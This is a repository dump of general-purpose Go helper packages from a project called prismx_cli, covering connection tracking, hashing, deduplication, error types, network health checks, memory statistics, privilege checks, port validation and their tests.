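	m := &mapsutil.SyncLockMap[net.Conn, struct{}]{
		Map: mapsutil.Map[net.Conn, struct{}]{},
	}
	return &InFlightConns{inflightConns: m}, nil
}

// Add registers conn as in flight. A failure to store it is ignored.
func (i *InFlightConns) Add(conn net.Conn) {
	_ = i.inflightConns.Set(conn, struct{}{})
}

// Remove forgets conn without closing it.
func (i *InFlightConns) Remove(conn net.Conn) {
	i.inflightConns.Delete(conn)
}

// Close closes every tracked connection, empties the tracker and returns the
// combined close errors, if any.
func (i *InFlightConns) Close() error {
	var errs []error

	// The callback always returns nil so one failing Close does not stop the
	// remaining connections from being closed.
	_ = i.inflightConns.Iterate(func(conn net.Conn, _ struct{}) error {
		if err := conn.Close(); err != nil {
			errs = append(errs, err)
		}
		return nil
	})

	if ok := i.inflightConns.Clear(); !ok {
		errs = append(errs, errors.New("couldn't empty in flight connections"))
	}

	return multierr.Combine(errs...)
}
--------------------------------------------------------------------------------
/utils/putils/consts/errors.go:
--------------------------------------------------------------------------------
package consts

import "errors"

var (
	// ErrNotSupported is returned for operations that are not supported.
	ErrNotSupported = errors.New("not supported")
)
--------------------------------------------------------------------------------
/utils/putils/context/context.go:
--------------------------------------------------------------------------------
package contextutil

import (
	"context"
	"errors"
)

// ErrIncorrectNumberOfItems is returned by WithValues when the arguments do
// not form complete key/value pairs.
var ErrIncorrectNumberOfItems = errors.New("number of items is not even")

// DefaultContext is the context ValueOrDefault falls back to.
var DefaultContext = context.TODO()

// ContextArg is the type used for both keys and values passed to WithValues.
type ContextArg string

// WithValues combines multiple key-value pairs into an existing context.
// keyValue is read as key0, value0, key1, value1, ...; an odd number of items
// returns the context unchanged together with ErrIncorrectNumberOfItems.
func WithValues(ctx context.Context, keyValue ...ContextArg) (context.Context, error) {
	if len(keyValue)%2 != 0 {
		return ctx, ErrIncorrectNumberOfItems
	}

	// Step by two: advancing one item at a time also stored every value as a
	// key for the following key (value0 -> key1), polluting the context.
	for i := 0; i < len(keyValue)-1; i += 2 {
		ctx = context.WithValue(ctx, keyValue[i], keyValue[i+1]) //nolint
	}
	return ctx, nil
}

// ValueOrDefault returns default context if given is nil (using interface to avoid static check reporting)
func ValueOrDefault(value interface{}) context.Context {
	if ctx, ok := value.(context.Context); ok && ctx != nil {
		return ctx
	}

	return DefaultContext
}
--------------------------------------------------------------------------------
/utils/putils/conversion/conversion.go:
--------------------------------------------------------------------------------
package conversion

import "unsafe"

// Bytes returns a byte slice that aliases the memory of s without copying.
// The result must be treated as read-only: string data is immutable, and a
// write through the slice breaks that guarantee for every holder of s.
func Bytes(s string) []byte {
	return unsafe.Slice(unsafe.StringData(s), len(s))
}

// String returns a string that aliases the memory of b without copying.
// b must not be modified afterwards, otherwise the returned string changes
// under its users.
func String(b []byte) string {
	if len(b) == 0 {
		return ""
	}
	return unsafe.String(unsafe.SliceData(b), len(b))
}
--------------------------------------------------------------------------------
/utils/putils/conversion/conversion_test.go:
--------------------------------------------------------------------------------
package conversion

import (
	"bytes"
	"testing"
)

// TestBytes checks the string-to-bytes view for a non-empty and an empty input.
func TestBytes(t *testing.T) {
	testCases := []struct {
		input    string
		expected []byte
	}{
		{"test", []byte("test")},
		{"", []byte("")},
	}

	for _, tc := range testCases {
		result := Bytes(tc.input)
		if !bytes.Equal(result, tc.expected) {
			t.Errorf("Expected %v, but got %v", tc.expected, result)
		}
	}
}

// TestString checks the bytes-to-string view for a non-empty and an empty input.
func TestString(t *testing.T) {
	testCases := []struct {
		input    []byte
		expected string
	}{
		{[]byte("test"), "test"},
		{[]byte(""), ""},
	}

	for _, tc := range testCases {
		result := String(tc.input)
		if result != tc.expected {
			t.Errorf("Expected %s, but got %s", tc.expected, result)
		}
	}
}
--------------------------------------------------------------------------------
/utils/putils/crypto/README.md:
--------------------------------------------------------------------------------
# cryptoutil
The package contains various helpers about crypto
--------------------------------------------------------------------------------
/utils/putils/crypto/hash.go:
--------------------------------------------------------------------------------
package cryptoutil

import (
	"crypto/sha256"
	"encoding/hex"
)

// SHA256Sum returns the lowercase hex SHA-256 digest of data, which must be
// a []byte or a string. Any other type yields the empty string, so callers
// cannot tell an unsupported input from a digest by the return value alone.
func SHA256Sum(data interface{}) string {
	hasher := sha256.New()
	switch v := data.(type) {
	case []byte:
		hasher.Write(v)
	case string:
		hasher.Write([]byte(v))
	default:
		return ""
	}

	return hex.EncodeToString(hasher.Sum(nil))
}
--------------------------------------------------------------------------------
/utils/putils/crypto/hash_test.go:
--------------------------------------------------------------------------------
package cryptoutil

import (
	"testing"

	"github.com/stretchr/testify/require"
)

// TestSHA256Sum compares SHA256Sum against known digests of two strings.
func TestSHA256Sum(t *testing.T) {
	tests := map[string]string{
		"test":  "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
		"test1": "1b4f0e9851971998e732078544c96b36c3d01cedf7caa332359d6f1d83567014",
	}
	for item, hash := range tests {
		require.Equal(t, hash, SHA256Sum(item), "hash is different")
	}
}
--------------------------------------------------------------------------------
/utils/putils/dedupe/leveldb.go:
--------------------------------------------------------------------------------
package dedupe

import (
	"prismx_cli/utils/hmap/store/hybrid"
)

// LevelDBBackend is a deduplication backend that keeps seen elements in a
// disk-backed hybrid map.
type LevelDBBackend struct {
	storage *hybrid.HybridMap
}

// NewLevelDBBackend creates a backend using hybrid.DefaultDiskOptions.
func NewLevelDBBackend() *LevelDBBackend {
	l := &LevelDBBackend{}
	db, err := hybrid.New(hybrid.DefaultDiskOptions)
	if err != nil {
		// NOTE(review): the error is dropped and db is presumably nil here, so
		// the other methods would dereference a nil storage. The signature has
		// no error result; callers cannot detect this failure.
	}
	l.storage = db
	return l
}

// Upsert records elem and reports whether it was new. It returns false both
// when elem was already present and when storing it failed.
func (l *LevelDBBackend) Upsert(elem string) bool {
	_, exists := l.storage.Get(elem)
	if exists {
		return false
	}

	if err := l.storage.Set(elem, nil); err != nil {
		return false
	}
	return true
}

// IterCallback calls callback once for every stored element. The result of
// the underlying scan is not checked.
func (l *LevelDBBackend) IterCallback(callback func(elem string)) {
	l.storage.Scan(func(k, _ []byte) error {
		callback(string(k))
		return nil
	})
}

// Cleanup closes the underlying storage, ignoring any close error.
func (l *LevelDBBackend) Cleanup() {
	_ = l.storage.Close()
}
--------------------------------------------------------------------------------
/utils/putils/dedupe/map.go: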
-------------------------------------------------------------------------------- 1 | package dedupe 2 | 3 | import "runtime/debug" 4 | 5 | type MapBackend struct { 6 | storage map[string]struct{} 7 | } 8 | 9 | func NewMapBackend() *MapBackend { 10 | return &MapBackend{storage: map[string]struct{}{}} 11 | } 12 | 13 | func (m *MapBackend) Upsert(elem string) bool { 14 | if _, exists := m.storage[elem]; exists { 15 | return false 16 | } 17 | m.storage[elem] = struct{}{} 18 | return true 19 | } 20 | 21 | func (m *MapBackend) IterCallback(callback func(elem string)) { 22 | for k := range m.storage { 23 | callback(k) 24 | } 25 | } 26 | 27 | func (m *MapBackend) Cleanup() { 28 | m.storage = nil 29 | // By default GC doesnot release buffered/allocated memory 30 | // since there always is possibilitly of needing it again/immediately 31 | // and releases memory in chunks 32 | // debug.FreeOSMemory forces GC to release allocated memory at once 33 | debug.FreeOSMemory() 34 | } 35 | -------------------------------------------------------------------------------- /utils/putils/errors/err_with_fmt.go: -------------------------------------------------------------------------------- 1 | package errorutil 2 | 3 | import ( 4 | "fmt" 5 | ) 6 | 7 | // ErrWithFmt is a simplified version of err holding a default format 8 | type ErrWithFmt struct { 9 | fmt string 10 | } 11 | 12 | // Wrapf wraps given message 13 | func (e *ErrWithFmt) Msgf(args ...any) error { 14 | return fmt.Errorf(e.fmt, args...) 
15 | } 16 | 17 | func (e *ErrWithFmt) Error() { 18 | panic("ErrWithFmt is a format holder") 19 | } 20 | 21 | func NewWithFmt(fmt string) ErrWithFmt { 22 | if fmt == "" { 23 | panic("format can't be empty") 24 | } 25 | 26 | return ErrWithFmt{fmt: fmt} 27 | } 28 | -------------------------------------------------------------------------------- /utils/putils/errors/errinterface.go: -------------------------------------------------------------------------------- 1 | package errorutil 2 | 3 | // Error is enriched version of normal error 4 | // with tags, stacktrace and other methods 5 | type Error interface { 6 | // WithTag assigns tag[s] to Error 7 | WithTag(tag ...string) Error 8 | // WithLevel assigns given ErrorLevel 9 | WithLevel(level ErrorLevel) Error 10 | // Error is interface method of 'error' 11 | Error() string 12 | // Wraps existing error with errors (skips if passed error is nil) 13 | Wrap(err ...error) Error 14 | // Msgf wraps error with given message 15 | Msgf(format string, args ...any) Error 16 | // Equal Checks Equality of errors 17 | Equal(err ...error) bool 18 | // WithCallback execute ErrCallback function when Error is triggered 19 | WithCallback(handle ErrCallback) Error 20 | } 21 | -------------------------------------------------------------------------------- /utils/putils/errors/errlevel.go: -------------------------------------------------------------------------------- 1 | package errorutil 2 | 3 | type ErrorLevel uint 4 | 5 | const ( 6 | Panic ErrorLevel = iota 7 | Fatal 8 | Runtime // Default 9 | ) 10 | 11 | func (l ErrorLevel) String() string { 12 | switch l { 13 | case Panic: 14 | return "PANIC" 15 | case Fatal: 16 | return "FATAL" 17 | case Runtime: 18 | return "RUNTIME" 19 | } 20 | return "RUNTIME" //default is runtime 21 | } 22 | -------------------------------------------------------------------------------- /utils/putils/exec/README.md: -------------------------------------------------------------------------------- 1 | # executil 2 
| The package contains various helpers to interact binary execution -------------------------------------------------------------------------------- /utils/putils/file/README.md: -------------------------------------------------------------------------------- 1 | # fileutil 2 | The package contains various helpers to interact with files -------------------------------------------------------------------------------- /utils/putils/file/tests/empty_lines.txt: -------------------------------------------------------------------------------- 1 | test 2 | test1 3 | 4 | 5 | 6 | 7 | test2 8 | 9 | 10 | test3 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | test4 19 | -------------------------------------------------------------------------------- /utils/putils/file/tests/path-traversal.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yqcs/prismx/8b32e33639e031f38d6f9a4dee4b2a15fec1f13e/utils/putils/file/tests/path-traversal.txt -------------------------------------------------------------------------------- /utils/putils/file/tests/pipe_separator.txt: -------------------------------------------------------------------------------- 1 | test|test1|test2|test3|test4 2 | -------------------------------------------------------------------------------- /utils/putils/file/tests/standard.txt: -------------------------------------------------------------------------------- 1 | test 2 | test1 3 | test2 4 | test3 5 | test4 6 | -------------------------------------------------------------------------------- /utils/putils/folder/README.md: -------------------------------------------------------------------------------- 1 | # folderutil 2 | The package contains various helpers to interact with folders 3 | 4 | ## UserConfigDirOrDefault 5 | 6 | UserConfigDirOrDefault returns the default root directory to use for user-specific configuration data. 
Users should create their own application-specific subdirectory within this one and use that. 7 | 8 | On Unix systems, it returns $XDG_CONFIG_HOME as specified by https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html if non-empty, else $HOME/.config. On Darwin, it returns $HOME/Library/Application Support. On Windows, it returns %AppData%. On Plan 9, it returns $home/lib. 9 | 10 | If the location cannot be determined (for example, $HOME is not defined), then it will return given value as default. -------------------------------------------------------------------------------- /utils/putils/folder/folderutil_linux_test.go: -------------------------------------------------------------------------------- 1 | //go:build !windows 2 | 3 | package folderutil 4 | 5 | import ( 6 | "testing" 7 | 8 | "github.com/stretchr/testify/assert" 9 | ) 10 | 11 | func TestPathInfo(t *testing.T) { 12 | got, err := NewPathInfo("/a/b/c") 13 | assert.Nil(t, err) 14 | gotPaths, err := got.Paths() 15 | assert.Nil(t, err) 16 | assert.EqualValues(t, []string{"/", "/a", "/a/b", "/a/b/c"}, gotPaths) 17 | gotMeshPaths, err := got.MeshWith("test.txt") 18 | assert.Nil(t, err) 19 | assert.EqualValues(t, []string{"/test.txt", "/a/test.txt", "/a/b/test.txt", "/a/b/c/test.txt"}, gotMeshPaths) 20 | } 21 | -------------------------------------------------------------------------------- /utils/putils/folder/folderutil_win_test.go: -------------------------------------------------------------------------------- 1 | //go:build windows 2 | 3 | package folderutil 4 | 5 | import ( 6 | "testing" 7 | 8 | "github.com/stretchr/testify/assert" 9 | ) 10 | 11 | func TestPathInfo(t *testing.T) { 12 | got, err := NewPathInfo("c:\\a\\b\\c") 13 | assert.Nil(t, err) 14 | gotPaths, err := got.Paths() 15 | assert.Nil(t, err) 16 | assert.EqualValues(t, []string{".", "c:\\", "c:\\a", "c:\\a\\b", "c:\\a\\b\\c"}, gotPaths) 17 | gotMeshPaths, err := got.MeshWith("test.txt") 18 | assert.Nil(t, err) 19 | 
assert.EqualValues(t, []string{"test.txt", "c:\\test.txt", "c:\\a\\test.txt", "c:\\a\\b\\test.txt", "c:\\a\\b\\c\\test.txt"}, gotMeshPaths) 20 | } 21 | -------------------------------------------------------------------------------- /utils/putils/generic/generic.go: -------------------------------------------------------------------------------- 1 | package generic 2 | 3 | import ( 4 | "bytes" 5 | "encoding/gob" 6 | ) 7 | 8 | // EqualsAny checks if a base value of type T is equal to 9 | // any of the other values of type T provided as arguments. 10 | func EqualsAny[T comparable](base T, all ...T) bool { 11 | for _, v := range all { 12 | if v == base { 13 | return true 14 | } 15 | } 16 | return false 17 | } 18 | 19 | // EqualsAll checks if a base value of type T is equal to all of the 20 | // other values of type T provided as arguments. 21 | func EqualsAll[T comparable](base T, all ...T) bool { 22 | if len(all) == 0 { 23 | return false 24 | } 25 | for _, v := range all { 26 | if v != base { 27 | return false 28 | } 29 | } 30 | return true 31 | } 32 | 33 | // SizeOf returns the approx size of a variable in bytes 34 | func ApproxSizeOf[T any](v T) (int, error) { 35 | buf := new(bytes.Buffer) 36 | if err := gob.NewEncoder(buf).Encode(v); err != nil { 37 | return 0, err 38 | } 39 | return buf.Len(), nil 40 | } 41 | -------------------------------------------------------------------------------- /utils/putils/generic/lockable.go: -------------------------------------------------------------------------------- 1 | package generic 2 | 3 | import ( 4 | "sync" 5 | ) 6 | 7 | type Lockable[K any] struct { 8 | V K 9 | sync.RWMutex 10 | } 11 | 12 | func (v *Lockable[K]) Do(f func(val K)) { 13 | v.Lock() 14 | defer v.Unlock() 15 | f(v.V) 16 | } 17 | 18 | func WithLock[K any](val K) *Lockable[K] { 19 | return &Lockable[K]{V: val} 20 | } 21 | -------------------------------------------------------------------------------- /utils/putils/generic/lockable_test.go: 
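--------------------------------------------------------------------------------
package generic

import (
	"sync"
	"testing"
)

// TestDo checks that Do hands the wrapped value to the callback.
func TestDo(t *testing.T) {
	val := 10
	l := WithLock(val)
	l.Do(func(v int) {
		if v != val {
			t.Errorf("Expected %d, got %d", val, v)
		}
	})
}

// TestLockableConcurrency increments the wrapped counter from 100 goroutines
// and expects no lost updates.
func TestLockableConcurrency(t *testing.T) {
	l := WithLock(0)

	var wg sync.WaitGroup

	for i := 0; i < 100; i++ {
		wg.Add(1)
		go func() {
			defer wg.Done()
			for j := 0; j < 1000; j++ {
				// The callback receives a copy, so the new value is written
				// back to l.V inside the callback.
				l.Do(func(v int) {
					v++
					l.V = v
				})
			}
		}()
	}

	wg.Wait()

	if l.V != 100*1000 {
		t.Errorf("Expected counter to be %d, but got %d", 100*1000, l.V)
	}
}

// TestLockableStringManipulation updates a wrapped string through Do.
func TestLockableStringManipulation(t *testing.T) {
	str := "initial"
	l := WithLock(str)

	l.Do(func(s string) {
		s += " - updated"
		l.V = s
	})

	if l.V != "initial - updated" {
		// Report the value that was compared (l.V), not the untouched local.
		t.Errorf("Expected 'initial - updated', got '%s'", l.V)
	}
}
--------------------------------------------------------------------------------
/utils/putils/healthcheck/connection.go:
--------------------------------------------------------------------------------
package healthcheck

import (
	"fmt"
	"net"
	"strconv"
	"time"
)

// ConnectionInfo is the outcome of one dial attempt made by CheckConnection.
type ConnectionInfo struct {
	Host       string // host as passed by the caller
	Successful bool   // true when the dial returned no error
	Message    string // human-readable summary of the attempt
	Error      error  // dial error, nil on success
}

// CheckConnection dials host:port over protocol, waiting at most timeout, and
// reports whether the connection could be established. An established
// connection is closed immediately; only reachability is probed.
func CheckConnection(host string, port int, protocol string, timeout time.Duration) ConnectionInfo {
	address := net.JoinHostPort(host, strconv.Itoa(port))
	conn, err := net.DialTimeout(protocol, address, timeout)
	if conn != nil {
		// A close error changes nothing about the reachability result.
		_ = conn.Close()
	}

	// The summary has to agree with Successful and Error: a log line or a
	// caller matching on Message must not read a failed dial as a working
	// connection.
	status := "Successful"
	if err != nil {
		status = "Failed"
	}

	return ConnectionInfo{
		Host:       host,
		Successful: err == nil,
		Message:    fmt.Sprintf("%s Connect (%s:%v): %s", protocol, host, port, status),
		Error:      err,
	}
}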
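--------------------------------------------------------------------------------
/utils/putils/healthcheck/connection_test.go:
--------------------------------------------------------------------------------
package healthcheck

import (
	"testing"
	"time"

	"github.com/stretchr/testify/assert"
)

// TestCheckConnection exercises CheckConnection against a reachable host, an
// unresolvable host and an address expected to time out. It needs network access.
func TestCheckConnection(t *testing.T) {
	t.Run("Test successful connection", func(t *testing.T) {
		info := CheckConnection("scanme.sh", 80, "tcp", 1*time.Second)
		assert.NoError(t, info.Error)
		assert.True(t, info.Successful)
		assert.Equal(t, "scanme.sh", info.Host)
		assert.Contains(t, info.Message, "Successful")
	})

	t.Run("Test unsuccessful connection", func(t *testing.T) {
		info := CheckConnection("invalid.website", 80, "tcp", 1*time.Second)
		assert.Error(t, info.Error)
	})

	t.Run("Test timeout connection", func(t *testing.T) {
		info := CheckConnection("192.0.2.0", 80, "tcp", 1*time.Millisecond)
		assert.Error(t, info.Error)
	})
}
--------------------------------------------------------------------------------
/utils/putils/healthcheck/dns.go:
--------------------------------------------------------------------------------
package healthcheck

import (
	"context"
	"net"
	"strings"
)

// DnsResolveInfo is the outcome of one lookup made by DnsResolve.
type DnsResolveInfo struct {
	Host        string       // name that was looked up
	Resolver    string       // resolver as passed by the caller
	Successful  bool         // true when the lookup returned no error
	IPAddresses []net.IPAddr // resolved addresses, nil on failure
	Error       error        // lookup error, nil on success
}

// DnsResolve looks up host through the given resolver and reports the result.
func DnsResolve(host string, resolver string) DnsResolveInfo {
	ipAddresses, err := getIPAddresses(host, resolver)

	return DnsResolveInfo{
		Host:        host,
		Resolver:    resolver,
		Successful:  err == nil,
		IPAddresses: ipAddresses,
		Error:       err,
	}
}

// getIPAddresses resolves name using dnsServer, given as "host" or
// "host:port"; port 53 is used when none is given.
func getIPAddresses(name, dnsServer string) ([]net.IPAddr, error) {
	// Append the default port only when the address does not already parse as
	// host:port. Testing for a bare ":" misreads an IPv6 literal such as
	// 2001:db8::1 as already carrying a port.
	if _, _, err := net.SplitHostPort(dnsServer); err != nil {
		dnsServer = net.JoinHostPort(strings.Trim(dnsServer, "[]"), "53")
	}

	// The dial address offered by the resolver is ignored so that every query
	// goes to dnsServer instead of the system-configured servers.
	resolver := net.Resolver{
		PreferGo: true,
		Dial: func(ctx context.Context, network, _ string) (net.Conn, error) {
			d := net.Dialer{}
			return d.DialContext(ctx, network, dnsServer)
		},
	}

	resolvedIPs, err := resolver.LookupIPAddr(context.Background(), name)
	if err != nil {
		return nil, err
	}

	return resolvedIPs, nil
}
--------------------------------------------------------------------------------
/utils/putils/healthcheck/dns_test.go:
--------------------------------------------------------------------------------
package healthcheck

import (
	"testing"

	"github.com/stretchr/testify/assert"
)

// TestDnsResolve covers a successful lookup, an unknown host and an unusable
// resolver. It needs network access.
func TestDnsResolve(t *testing.T) {
	t.Run("Successful resolution", func(t *testing.T) {
		info := DnsResolve("scanme.sh", "1.1.1.1")
		assert.NoError(t, info.Error)
		assert.True(t, info.Successful)
		assert.Equal(t, "scanme.sh", info.Host)
		assert.Equal(t, "1.1.1.1", info.Resolver)
		assert.NotEmpty(t, info.IPAddresses)
	})

	t.Run("Unsuccessful resolution due to invalid host", func(t *testing.T) {
		info := DnsResolve("invalid.website", "1.1.1.1")
		assert.Error(t, info.Error)
	})

	t.Run("Unsuccessful resolution due to invalid resolver", func(t *testing.T) {
		info := DnsResolve("google.com", "invalid.resolver")
		assert.Error(t, info.Error)
	})
}
--------------------------------------------------------------------------------
/utils/putils/healthcheck/path_permission.go:
--------------------------------------------------------------------------------
package healthcheck

import (
	"errors"

	fileutil "prismx_cli/utils/putils/file"
)

// PathPermission is the outcome of CheckPathPermission. Only Error is
// exported; the path and the two permission flags are visible to this
// package alone.
type PathPermission struct {
	path       string
	isReadable bool
	isWritable bool
	Error      error
}

// CheckPathPermission checks the permissions of the given file or directory.
// Error is set only when the path does not exist.
func CheckPathPermission(path string) (pathPermission PathPermission) {
	pathPermission.path = path
	if !fileutil.FileExists(path) {
		pathPermission.Error = errors.New("file or directory doesn't exist at " + path)
		return
	}

	// NOTE(review): errors from both checks are dropped, so a false flag can
	// mean "not permitted" or "could not be determined".
	pathPermission.isReadable, _ = fileutil.IsReadable(path)
	pathPermission.isWritable, _ = fileutil.IsWriteable(path)

	return
}
--------------------------------------------------------------------------------
/utils/putils/http/README.md:
--------------------------------------------------------------------------------
# httputil
The package contains various helpers related to http protocol
--------------------------------------------------------------------------------
/utils/putils/ip/README.md:
--------------------------------------------------------------------------------
# iputil
The package contains various helpers to interact with ips and cidrs
--------------------------------------------------------------------------------
/utils/putils/maps/README.md:
--------------------------------------------------------------------------------
# mapsutil
The package contains various helpers to interact with maps
--------------------------------------------------------------------------------
/utils/putils/memguardian/README.MD:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yqcs/prismx/8b32e33639e031f38d6f9a4dee4b2a15fec1f13e/utils/putils/memguardian/README.MD
--------------------------------------------------------------------------------
/utils/putils/memguardian/doc.go:
--------------------------------------------------------------------------------
// memguardian is a package that provides a simple RAM memory control mechanism
// once activated it sets an internal atomic boolean when the RAM usage exceeds in absolute
// terms the warning ratio, for passive indirect check or invokes an optional callback for
// reactive backpressure
package memguardian
--------------------------------------------------------------------------------
/utils/putils/memguardian/memory.go:
--------------------------------------------------------------------------------
package memguardian

// SysInfo is a snapshot of system memory figures. totalRam and freeRam are
// counted in multiples of Unit bytes; use TotalRam and FreeRam for byte values.
type SysInfo struct {
	Uptime      int64
	totalRam    uint64
	freeRam     uint64
	SharedRam   uint64
	BufferRam   uint64
	TotalSwap   uint64
	FreeSwap    uint64
	Unit        uint64
	usedPercent float64 // precomputed percentage; takes precedence when > 0
}

// TotalRam returns the total RAM scaled by Unit.
func (si *SysInfo) TotalRam() uint64 {
	return uint64(si.totalRam) * uint64(si.Unit)
}

// FreeRam returns the free RAM scaled by Unit.
func (si *SysInfo) FreeRam() uint64 {
	return uint64(si.freeRam) * uint64(si.Unit)
}

// UsedRam returns TotalRam minus FreeRam.
func (si *SysInfo) UsedRam() uint64 {
	return si.TotalRam() - si.FreeRam()
}

// UsedPercent returns the used share of RAM as a percentage. A precomputed
// value is returned when present; otherwise it is derived from TotalRam and
// FreeRam, and is 0 when the total is unknown.
func (si *SysInfo) UsedPercent() float64 {
	if si.usedPercent > 0 {
		return si.usedPercent
	}

	total := si.TotalRam()
	if total == 0 {
		// Avoid 0/0 (NaN), which never compares above a warning threshold.
		return 0
	}

	// TotalRam and FreeRam are already scaled by Unit. Scaling the difference
	// again inflated the percentage whenever Unit != 1, which misleads any
	// limit derived from this value.
	return 100 * float64(si.UsedRam()) / float64(total)
}

// GetSysInfo returns the memory snapshot for the current platform.
func GetSysInfo() (*SysInfo, error) {
	return getSysInfo()
}
--------------------------------------------------------------------------------
/utils/putils/memguardian/memory_linux.go:
--------------------------------------------------------------------------------
//go:build linux

package memguardian

import "syscall"

// getSysInfo fills SysInfo from the sysinfo system call.
func getSysInfo() (*SysInfo, error) {
	var sysInfo syscall.Sysinfo_t
	err := syscall.Sysinfo(&sysInfo)
	if err != nil {
		return nil, err
	}

	si := &SysInfo{
		Uptime:   int64(sysInfo.Uptime),
		totalRam: uint64(sysInfo.Totalram),
		freeRam:  uint64(sysInfo.Freeram),
		// Shared memory has its own field; Freeram was copied here by mistake.
		SharedRam: uint64(sysInfo.Sharedram),
		BufferRam: uint64(sysInfo.Bufferram),
		TotalSwap: uint64(sysInfo.Totalswap),
		FreeSwap:  uint64(sysInfo.Freeswap),
		Unit:      uint64(sysInfo.Unit),
	}

	return si, nil
}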
-------------------------------------------------------------------------------- /utils/putils/memguardian/memory_others.go: -------------------------------------------------------------------------------- 1 | //go:build !linux 2 | 3 | package memguardian 4 | 5 | import "github.com/shirou/gopsutil/mem" 6 | 7 | // TODO: replace with native syscall 8 | func getSysInfo() (*SysInfo, error) { 9 | vms, err := mem.VirtualMemory() 10 | if err != nil { 11 | return nil, err 12 | } 13 | si := &SysInfo{ 14 | totalRam: vms.Total, 15 | freeRam: vms.Free, 16 | SharedRam: vms.Shared, 17 | TotalSwap: vms.SwapTotal, 18 | FreeSwap: vms.SwapFree, 19 | usedPercent: vms.UsedPercent, 20 | } 21 | 22 | return si, nil 23 | } 24 | -------------------------------------------------------------------------------- /utils/putils/ml/model_selection/model_selection.go: -------------------------------------------------------------------------------- 1 | package modelselection 2 | 3 | import ( 4 | "math/rand" 5 | ) 6 | 7 | func TrainTestSplit(dataset []interface{}, testSize float64) (train, test []interface{}) { 8 | for _, data := range dataset { 9 | if rand.Float64() > testSize { 10 | train = append(train, data) 11 | } else { 12 | test = append(test, data) 13 | } 14 | } 15 | return train, test 16 | } 17 | -------------------------------------------------------------------------------- /utils/putils/ml/naive_bayes/naive_bayes_classifier_test.go: -------------------------------------------------------------------------------- 1 | package naive_bayes 2 | 3 | import ( 4 | "testing" 5 | 6 | "github.com/stretchr/testify/assert" 7 | ) 8 | 9 | func TestNaiveBayesClassifier(t *testing.T) { 10 | // Create a new Naive Bayes Classifier 11 | threshold := 1.1 12 | nb := New(threshold) 13 | 14 | // Create a new training set 15 | trainingSet := map[string][]string{ 16 | "Baseball": { 17 | "Pitcher", 18 | "Shortstop", 19 | "Outfield", 20 | }, 21 | "Basketball": { 22 | "Point Guard", 23 | "Shooting Guard", 24 | 
"Small Forward", 25 | "Power Forward", 26 | "Center", 27 | }, 28 | "Soccer": { 29 | "Goalkeeper", 30 | "Defender", 31 | "Midfielder", 32 | "Forward", 33 | }, 34 | } 35 | 36 | // Train the classifier 37 | nb.Fit(trainingSet) 38 | 39 | //then 40 | assert.Equal(t, nb.Classify("Point guard"), "Basketball") 41 | } 42 | -------------------------------------------------------------------------------- /utils/putils/ml/types.go: -------------------------------------------------------------------------------- 1 | package mlutils 2 | 3 | type LabeledDocument struct { 4 | Label string 5 | Document string 6 | } 7 | -------------------------------------------------------------------------------- /utils/putils/net/net.go: -------------------------------------------------------------------------------- 1 | package netutil 2 | 3 | import ( 4 | "errors" 5 | "net" 6 | ) 7 | 8 | var ErrMissingPort = errors.New("missing port") 9 | 10 | // TryJoinHostPort joins host and port. If port is empty, it returns host and an error. 
// An empty host is rejected with a *net.AddrError. An empty port is reported
// with ErrMissingPort while host is still returned unchanged, so the caller
// can decide on a default port. Neither value is validated beyond the empty
// check; net.JoinHostPort adds brackets when host contains a colon, as an
// IPv6 literal does.
func TryJoinHostPort(host, port string) (string, error) {
	switch {
	case host == "":
		return "", &net.AddrError{Err: "missing host", Addr: host}
	case port == "":
		return host, ErrMissingPort
	default:
		return net.JoinHostPort(host, port), nil
	}
}
// IsRoot holds the result of checkCurrentUserRoot as evaluated once, when the
// package is initialised.
var IsRoot bool

// HasCapNetRaw holds the result of checkCurrentUserCapNetRaw as evaluated
// once, when the package is initialised.
var HasCapNetRaw bool

func init() {
	// Both probes run at import time and their errors are discarded. A false
	// flag therefore means either "not privileged" or "could not be
	// determined": on the platforms covered by permission_other.go the
	// CAP_NET_RAW probe always returns ErrNotImplemented, which leaves
	// HasCapNetRaw false. Callers that gate privileged operations on these
	// flags should treat false as "unknown" rather than as a definitive no.
	IsRoot, _ = checkCurrentUserRoot()
	HasCapNetRaw, _ = checkCurrentUserCapNetRaw()
}
// IsValid reports whether v is a port number in the range 1-65535.
// Only string and int values are inspected; every other dynamic type,
// including other integer widths and floats, yields false.
func IsValid(v interface{}) bool {
	if s, ok := v.(string); ok {
		return IsValidWithString(s)
	}
	if n, ok := v.(int); ok {
		return IsValidWithInt(n)
	}
	return false
}

// IsValidWithString reports whether p parses as a decimal integer in the
// range 1-65535. Parsing is delegated to strconv.Atoi, so a leading "+" and
// leading zeros are accepted ("+80" and "0080" are valid) while surrounding
// whitespace is not. Callers that compare ports as strings or keep them in
// allow-lists should normalise the value themselves after validation.
func IsValidWithString(p string) bool {
	n, err := strconv.Atoi(p)
	if err != nil {
		return false
	}
	return IsValidWithInt(n)
}

// IsValidWithInt reports whether port lies in 1-65535 inclusive.
func IsValidWithInt(port int) bool {
	const minPort, maxPort = 1, 65535
	return minPort <= port && port <= maxPort
}
// Safe dereferences v without panicking on a nil pointer:
//   - if v is nil, it returns the zero value of T
//   - otherwise it returns a copy of the value v points to
func Safe[T any](v *T) T {
	var zero T
	if v != nil {
		return *v
	}
	return zero
}
testCase[T any] struct { 13 | name string 14 | args args[T] 15 | want T 16 | } 17 | tests := []testCase[int]{ 18 | { 19 | name: "struct=>int - NilPointer", 20 | args: args[int]{v: nil}, 21 | want: 0, 22 | }, 23 | { 24 | name: "struct=>int - NonNilPointer", 25 | args: args[int]{v: new(int)}, 26 | want: 0, 27 | }, 28 | } 29 | 30 | for _, tt := range tests { 31 | t.Run(tt.name, func(t *testing.T) { 32 | got := Safe(tt.args.v) 33 | require.Equal(t, tt.want, got, "Safe() = %v, want %v", got, tt.want) 34 | }) 35 | } 36 | } 37 | -------------------------------------------------------------------------------- /utils/putils/race/README.md: -------------------------------------------------------------------------------- 1 | # raceutil 2 | The package contains various helpers for race 3 | -------------------------------------------------------------------------------- /utils/putils/race/norace.go: -------------------------------------------------------------------------------- 1 | //go:build !race 2 | 3 | // Package raceutil reports if the Go race detector is enabled. 4 | package raceutil 5 | 6 | // Enabled reports if the race detector is enabled. 7 | const Enabled = false 8 | -------------------------------------------------------------------------------- /utils/putils/race/race.go: -------------------------------------------------------------------------------- 1 | //go:build race 2 